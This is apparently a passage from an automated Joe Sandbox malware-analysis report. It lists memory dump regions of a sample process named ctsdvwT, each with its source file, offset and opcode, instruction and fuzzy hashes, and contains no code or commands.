                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: eb14dc15b2b8c72f2b305808d16728fbe946c70b81d1f594947bc522351661e5
                                        • Instruction ID: bfad046f55244ea2020d0f5c5e715b5e34f4e9aa2dc07704f031106fe881a8fe
                                        • Opcode Fuzzy Hash: eb14dc15b2b8c72f2b305808d16728fbe946c70b81d1f594947bc522351661e5
                                        • Instruction Fuzzy Hash: 29F06DB0E1E10CDBC744EF55C5009FDBBB9AB4F304F0095A6D4185B292DB318A46DF40
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2164388466.0000000002C6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C6D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_2c6d000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 60c157bf194f34afe2cf3cc247076e892d33c532d99526ac24c435939cbeb126
                                        • Instruction ID: 86534d2ef6526c766c12984604c26d465a79308a75aa3a03d597e69c554d64e8
                                        • Opcode Fuzzy Hash: 60c157bf194f34afe2cf3cc247076e892d33c532d99526ac24c435939cbeb126
                                        • Instruction Fuzzy Hash: B6F062715043449EE7208E16DCC8B62FFACEF95634F18C45AED494A28AC3799844CAB1
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9d5e4259d9d2e6bff0c3cc86bd16404f78fedbd343fbf3058efad84e1bc87cd4
                                        • Instruction ID: a3d4aa9f5750c04fc93cc997cd9fb5ee4fb0d0751ecf2de161b4e0f9435c7727
                                        • Opcode Fuzzy Hash: 9d5e4259d9d2e6bff0c3cc86bd16404f78fedbd343fbf3058efad84e1bc87cd4
                                        • Instruction Fuzzy Hash: 01F05970B107158FCB098B7888110DEBBB7AF88650F06446BD401D73A5EFB04C29C3C0
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6d9a5822f9e7f5c3c1fcaf6f62c49f6c7a70ade194d5ce6a7a9307441f8c3a1d
                                        • Instruction ID: 3b4debc432268bb304c0b124298b271a3b99d50ba0b4a8ce66cf56439704e01a
                                        • Opcode Fuzzy Hash: 6d9a5822f9e7f5c3c1fcaf6f62c49f6c7a70ade194d5ce6a7a9307441f8c3a1d
                                        • Instruction Fuzzy Hash: F3F05C307902185F8B94AB3C942485F37EF9FC8A21329007BE50AC7321DD34CC068797
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 97d85b839644d87dcc68ff5b50822acdef80752ba2e746eb124cbd6c5a5af872
                                        • Instruction ID: 9ffef9c0ad51ca7ffcdefc0bb0c1bf9db34ffec1852ac426604bfb7b3f269130
                                        • Opcode Fuzzy Hash: 97d85b839644d87dcc68ff5b50822acdef80752ba2e746eb124cbd6c5a5af872
                                        • Instruction Fuzzy Hash: DE01ECB080021DDFDB55DF55C4047EEBAF5AF44364F21852AE524AA291D7748A40CBD1
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dd5ae21467d896d0171ecba66d416d5472d285bf312ceca99fa21b64542e403a
                                        • Instruction ID: f3d6b92e2a195f0a4a8f05b7d6c99d5ad936e51f1fe5976fbc6b650b2ef508e6
                                        • Opcode Fuzzy Hash: dd5ae21467d896d0171ecba66d416d5472d285bf312ceca99fa21b64542e403a
                                        • Instruction Fuzzy Hash: 35F027B139061D47C358CA2BA80446FBBDFEBC5691B09C83FE10AC7224EA34D9478690
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ad6de66477ec79b01a9ec9e2efcaed059900194120decd038b24e3c9c2c96b0d
                                        • Instruction ID: 99c4b4d2a12dfaf34382f890dbcc93f04596446e9ef291d95df229d5632ea195
                                        • Opcode Fuzzy Hash: ad6de66477ec79b01a9ec9e2efcaed059900194120decd038b24e3c9c2c96b0d
                                        • Instruction Fuzzy Hash: 60E06D727001286F9304DAAEDC84C6BBBEEFBCCA70361807AF508C7310DA319C01C6A0
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 00dc2decaf16d5b87eb48e3ad7ff22c378ace2e6ff9f3905011481dc6c342270
                                        • Instruction ID: c611c4cd5b2e67d89a569cc879bc87713596d3cb3a36ffc0148b1df684821ccf
                                        • Opcode Fuzzy Hash: 00dc2decaf16d5b87eb48e3ad7ff22c378ace2e6ff9f3905011481dc6c342270
                                        • Instruction Fuzzy Hash: ECF02B757901255FCB94AB7CD52496E33E66FC892231A4477E50ACB322DE30CC078792
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ce69effae97e9311bddc818f9d84eaecf4c6d5fd5e4138e650b617a789532454
                                        • Instruction ID: e691670b42bfa959643230d7a2af12c214702254818e16f33b4c71654adb3297
                                        • Opcode Fuzzy Hash: ce69effae97e9311bddc818f9d84eaecf4c6d5fd5e4138e650b617a789532454
                                        • Instruction Fuzzy Hash: 10F0E972A04148AFDF4ADF98DC51D9E7FB6DF4421471480ABE004D7362DB30D9508754
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 38d7f4d07e0f4fe7640699e60f7e8f502dec2c3c668c0a4a6f7b1c0699eb6c91
                                        • Instruction ID: 3ecb5b1d96bff9beb2011f0cf57214fcd9172471d6099edc8ebbf918068709d7
                                        • Opcode Fuzzy Hash: 38d7f4d07e0f4fe7640699e60f7e8f502dec2c3c668c0a4a6f7b1c0699eb6c91
                                        • Instruction Fuzzy Hash: 05F0E5B091820DDBE748BBA9D4007EE7BBDAB8A300F00CD36940556354DB70494ACA52
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3e42071183d042fe803fa6d099196e25781ee4ba839a6c3782cb6967dcf15645
                                        • Instruction ID: a3a3a78cb0b0721dcc760c84e2dd348fec87c9124468b64d57b5eaaaad613491
                                        • Opcode Fuzzy Hash: 3e42071183d042fe803fa6d099196e25781ee4ba839a6c3782cb6967dcf15645
                                        • Instruction Fuzzy Hash: 39F09B357545504FC345EFA8D5655557BF1AF8CE11320449AE545CF365EF30CC06C791
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9c66a179df01a48f009f61cde4e1bf083cb376416572dcc7b4e999fe7a5686e3
                                        • Instruction ID: 1790683ad8913749feb0cf0023e1fd0b1a077da90b88a48e9d2fec176b847911
                                        • Opcode Fuzzy Hash: 9c66a179df01a48f009f61cde4e1bf083cb376416572dcc7b4e999fe7a5686e3
                                        • Instruction Fuzzy Hash: 70E02BB025C2884FC313277468153DC3FB10B03302F0D899BE444825B3D759040ECB15
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d059e02feffc439781a05bcc582ffac2fb2b9937f66db8b10e6347e2c67e41d8
                                        • Instruction ID: 0f695a981f1f29ae11169ab226937739bf6c9c3b53c6e647c4fcfa1d7ff37585
                                        • Opcode Fuzzy Hash: d059e02feffc439781a05bcc582ffac2fb2b9937f66db8b10e6347e2c67e41d8
                                        • Instruction Fuzzy Hash: 87E0863170051457D6185BAB9844A6BBBDFEFC9B20714C06DE51D93344CE60AC0186D5
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cfecf93fd7e2b5fe3f97ded65f501b42f37c64dbe406178c26735ddc7691c1b6
                                        • Instruction ID: 64f2cbf41dabc9d3a877f1a7c42baeef2aa5965d02b18ec5dc7e3d54faec313b
                                        • Opcode Fuzzy Hash: cfecf93fd7e2b5fe3f97ded65f501b42f37c64dbe406178c26735ddc7691c1b6
                                        • Instruction Fuzzy Hash: 89F0A5B4D1520CEFCB44EFA8D4459AEBBB5FB49301F1081AAE80493310D7359A54DF80
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 92e193313b12ee1ddeb9a9e9d6c1877cd66582d7bab37055cf8b27846665782d
                                        • Instruction ID: ec827ec4c9613d3a567103bb408ce41f162ba12a70b314b27ae8b649e63a155e
                                        • Opcode Fuzzy Hash: 92e193313b12ee1ddeb9a9e9d6c1877cd66582d7bab37055cf8b27846665782d
                                        • Instruction Fuzzy Hash: 08F0A574E0420CBFCB45EFA8D44469DBBB6EB49311F10C1AAE814A3350E6359A55DF91
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f9125448af389bca9add5491cad7cfe50884d2c9a47c003a2fc35d23596df455
                                        • Instruction ID: 76a3ee8898bff41fa322e518b0d7eb5aa362db63396424a81c1211fc332d0045
                                        • Opcode Fuzzy Hash: f9125448af389bca9add5491cad7cfe50884d2c9a47c003a2fc35d23596df455
                                        • Instruction Fuzzy Hash: FBE08C313505148F8344FFA8E5659567BEAAF8CA203208069F90ACB328EE30DC068B91
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8349817a3752e2df2e493448df5ea3d0ffcf9d56aca37d7a9b19ebf8ae6c9bfc
                                        • Instruction ID: bf836c762d2aed0807cd92713fc4633c9dafc5e2380c8165b3b5b1653ec467df
                                        • Opcode Fuzzy Hash: 8349817a3752e2df2e493448df5ea3d0ffcf9d56aca37d7a9b19ebf8ae6c9bfc
                                        • Instruction Fuzzy Hash: 7AD05EB1E1800CDFC740AAA4E8444EDFB70E78B251F004823D122E3210E7301425CA98
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0c2c0e89953f8526ba42e7503931f3078fc1802432de84d68c21d6f2c15bf13b
                                        • Instruction ID: 3cd85d7474f4d360b61e948f0a52208a322e7c8b6581b536a7441022331b8cdb
                                        • Opcode Fuzzy Hash: 0c2c0e89953f8526ba42e7503931f3078fc1802432de84d68c21d6f2c15bf13b
                                        • Instruction Fuzzy Hash: 31E0E2B092520CEFCB80EFA8D44A69DBFF4AB04211F1041A9E808E3350EB315A94CB81
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 687e1b4547c1523a97ad1392ed0507413e86ff091f0993f117e5f62476d4716c
                                        • Instruction ID: 58e1568adf4c8c57f620e1cbaed23c4f9f8f957bf2efdd8fb619f0f1f8253923
                                        • Opcode Fuzzy Hash: 687e1b4547c1523a97ad1392ed0507413e86ff091f0993f117e5f62476d4716c
                                        • Instruction Fuzzy Hash: 46D097638883C84FC71282A83EFA00D3BF10992010F280E97CC28CF1E3F04CC44A02C2
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.2230692793.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_11b0000_ctsdvwT.jbxd
                                        • Opcode Fuzzy Hash: ca27d485729e133cb5bc7f5863968b014bea6fc9574ab9b4825de4d7dd453a48
                                        • Instruction Fuzzy Hash: 7D31D331B05205AFDB28EB74E5A46ED77B2BF89248F210869D505EB350EB35CD05CB91
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.2230692793.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_11b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cd163da6b0bcb490fa64f69010edc6367be06a7e4a41384dd18a41885c7a43ef
                                        • Instruction ID: 34d14bc0c47757684fcf539fdeb745f1b6f622575ca5603ca2f2d17d1bec1d49
                                        • Opcode Fuzzy Hash: cd163da6b0bcb490fa64f69010edc6367be06a7e4a41384dd18a41885c7a43ef
                                        • Instruction Fuzzy Hash: F141FEB1D003499FDB14DFA9C584ADEBFF5FF48310F248029E819AB254DB75A989CB90
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.2230692793.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_11b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d688ced0bfab108b327c130ff0e3a795eb7a71270c642689e28d3da3ddb5fbfb
                                        • Instruction ID: 8e99343acb5a422b3d67963fb20bd8757571701540407609872d292f992d9a70
                                        • Opcode Fuzzy Hash: d688ced0bfab108b327c130ff0e3a795eb7a71270c642689e28d3da3ddb5fbfb
                                        • Instruction Fuzzy Hash: 9431AF35E10215CBCB19CF69D4947EEBBF2AF89300F108919E806E7790DB70AC42CB50
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.2230692793.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_11b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a6761a328437d4c0ebd2c30e5311fe24185c0e880ed281fcc04f955b0fee9261
                                        • Instruction ID: 6d5ab36584cf4b9cb54e1ef4f318f0f1602a7b1b5b38e4d34484d83f1b348692
                                        • Opcode Fuzzy Hash: a6761a328437d4c0ebd2c30e5311fe24185c0e880ed281fcc04f955b0fee9261
                                        • Instruction Fuzzy Hash: 67318E30B052159FDB69EF78C6A06ED77B3AF4D208F210469C805AB795DB36DD05CB90
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.2230692793.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_11b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fa8fdc4f532389aa215e6231ba0f3dfc07a353c4219562f2ab9bc94288b87b87
                                        • Instruction ID: fef3c3582692d25980bbb30249e5cdc381cb25b6b0a56f155356124b5e7fe759
                                        • Opcode Fuzzy Hash: fa8fdc4f532389aa215e6231ba0f3dfc07a353c4219562f2ab9bc94288b87b87
                                        • Instruction Fuzzy Hash: 443120345000416FDF1B9B3CFAEC7E93B56EB59308F054966D009CB55AD768CC06CB52
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.2230692793.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_11b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b791b0588aca4bc1bed0f3c839f1816dad904f2112758fdcd174fa396fd63e5b
                                        • Instruction ID: 840fbce4bec078f34e07fbeffeb89bdc2450f3169e9a6e4bd3aa99286b0bac0e
                                        • Opcode Fuzzy Hash: b791b0588aca4bc1bed0f3c839f1816dad904f2112758fdcd174fa396fd63e5b
                                        • Instruction Fuzzy Hash: 8641EDB4D002489FDB14DFA9C584ADEBFF5FF48310F24802AE809AB254DB75A949CB90
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.2230692793.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_11b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ca5ac51efa59e7a590c5709f708ca0080675fa7a00b9882ed58c495d7e01d5db
                                        • Instruction ID: a83672d43acea0936ff32a913290393b5df86a9057f6a6f451da94847f2cdd0c
                                        • Opcode Fuzzy Hash: ca5ac51efa59e7a590c5709f708ca0080675fa7a00b9882ed58c495d7e01d5db
                                        • Instruction Fuzzy Hash: CE316F30B052099FDB59EB38CA906EE77B3AF4D208F210469D401AB794DF36DD05CB91
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.2230692793.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_11b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0c44fe5911f8d04a8d04ef33ea2bc2201453c0161d2a099b792ddfae591f5c24
                                        • Instruction ID: 9d8089cf93413f59046f274841e60b1b4d665da4b633b36c94a069e01f05e029
                                        • Opcode Fuzzy Hash: 0c44fe5911f8d04a8d04ef33ea2bc2201453c0161d2a099b792ddfae591f5c24
                                        • Instruction Fuzzy Hash: 12314C34E106159BDB19CF69D8946EEBBF2AF89300F108529E816E7390DB70AC46CB51
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.2230692793.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_11b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 68b26e4e4c050ea0383e04620a9fc71c655b829ed6986960eb404f12d48994fe
                                        • Instruction ID: 45b8f1a6e125075887eb35333f3c87a8fe6dd9268f86d4078c81ef4cb06814ac
                                        • Opcode Fuzzy Hash: 68b26e4e4c050ea0383e04620a9fc71c655b829ed6986960eb404f12d48994fe
                                        • Instruction Fuzzy Hash: 69212B71F016416FDB256B7CA8983EA3BE6FB48358F150866E849C7385EB34C8418792
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.2230692793.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_11b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3b6d015116d81d3efaaae45c0296294ee2de53eab5c4df2bab5bf81a8e1065de
                                        • Instruction ID: 7cfc3b8b4db6206af5e2cc14c2ce4dc574387168f4c87a15f7e5a72c928f633e
                                        • Opcode Fuzzy Hash: 3b6d015116d81d3efaaae45c0296294ee2de53eab5c4df2bab5bf81a8e1065de
                                        • Instruction Fuzzy Hash: 36316F74E0021A9FDB1ACF68D5806DEFBB6FF89304F10861AE805EB745DB719846CB91
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.2230692793.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_11b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 05913a5d560ee45c23628446489cd9d52d8957182f3199652d2ad0a73c0c1494
                                        • Instruction ID: 1b2f32948c79dc7ddae7b6cc7da907d8a764b9faa7a570c54c6697f7533f7e28
                                        • Opcode Fuzzy Hash: 05913a5d560ee45c23628446489cd9d52d8957182f3199652d2ad0a73c0c1494
                                        • Instruction Fuzzy Hash: 1C217430E1021A9BDB19DF69D9846DEFBB6FF85704F10861AE805EB241DB709846CB91
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.2230692793.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_11b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 01fd684284b013543dfec59b93611cbd1f6958f3f6e67a8de2025726ec35ce60
                                        • Instruction ID: cfae5fa70a9e8eac6468e0dcb77d7c1458f9a9b1e3aae1f1cc7b31ecbcb17abd
                                        • Opcode Fuzzy Hash: 01fd684284b013543dfec59b93611cbd1f6958f3f6e67a8de2025726ec35ce60
                                        • Instruction Fuzzy Hash: 0921C570A052009FDB3A172CF9E87AD7B65EB06359F110D6AE40AC77D2EB2D8885C742
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.2230692793.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_11b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b9339f50a79e0d79479f27297c4eced7ac82943aa5d87120187862d5ec117a7f
                                        • Instruction ID: c5ee1195dbf829bf073b3cbd33e0e5db00ec170b8adf50a4fe08033274fec835
                                        • Opcode Fuzzy Hash: b9339f50a79e0d79479f27297c4eced7ac82943aa5d87120187862d5ec117a7f
                                        • Instruction Fuzzy Hash: 0721C931B002159FDB29AFBCA4A02EE7BF5EF59354F16047AE809E7341E735C8428791
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.2230692793.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_11b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5529abaa7167cfdebbb0604b712331fe2c4820c8f7f57845894e064118638409
                                        • Instruction ID: e609e6e616e83faca1e21464b1d3b334a92e3a8118a1213145b1c1929035f96a
                                        • Opcode Fuzzy Hash: 5529abaa7167cfdebbb0604b712331fe2c4820c8f7f57845894e064118638409
                                        • Instruction Fuzzy Hash: D021A431E0060A9BDB1DCF74C4946DEFBB6AF89310F24861AE815F7790DBB09846CB51
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.2230395368.0000000000F5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F5D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_f5d000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 64fed43b41eeb17a060cf92ce7281ea6020bcf8d888225618d1fd557bf96e58c
                                        • Instruction ID: a170a27bc4efaeaf7a065c2e9666bea622809fcb4ff27f41d42c60597ce72354
                                        • Opcode Fuzzy Hash: 64fed43b41eeb17a060cf92ce7281ea6020bcf8d888225618d1fd557bf96e58c
                                        • Instruction Fuzzy Hash: DF21F571505204DFDB24DF24D5C4B16BF65FB84325F20C569DE0A4B39AC33AD80BEA62
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.2230692793.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_11b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 41089fe3ff1088dd5a791e77fce452dc8afeae803545b6aab8978859a98d4075
                                        • Instruction ID: eda6dcd46f7fcaff6098a76d9aaa2deb79856058450aaa12c2eca8132a3c4760
                                        • Opcode Fuzzy Hash: 41089fe3ff1088dd5a791e77fce452dc8afeae803545b6aab8978859a98d4075
                                        • Instruction Fuzzy Hash: AF216030B04249AFDB28DB78D6A56EE77F5AF89244F610468C406EB764EB31CD04CBA1
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.2230692793.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_11b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a0436b025f2534198063ac1e75b2771e826f035f0a5390778f60ca0f0db1feb8
                                        • Instruction ID: 13ff4254ed6fad8c75255daf4c7221f6f3d6b0dc334ae486594e37b5996910f9
                                        • Opcode Fuzzy Hash: a0436b025f2534198063ac1e75b2771e826f035f0a5390778f60ca0f0db1feb8
                                        • Instruction Fuzzy Hash: A0216270E0020A9BDB1DCFA8C4906DEB7B6AF89710F20851AE815F7350DBB09846CB91
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.2230692793.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_11b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a46a7c8f0211332dc4f16b8ff13f20ec5f9e2d502a0df02fcd0398a7883ff42f
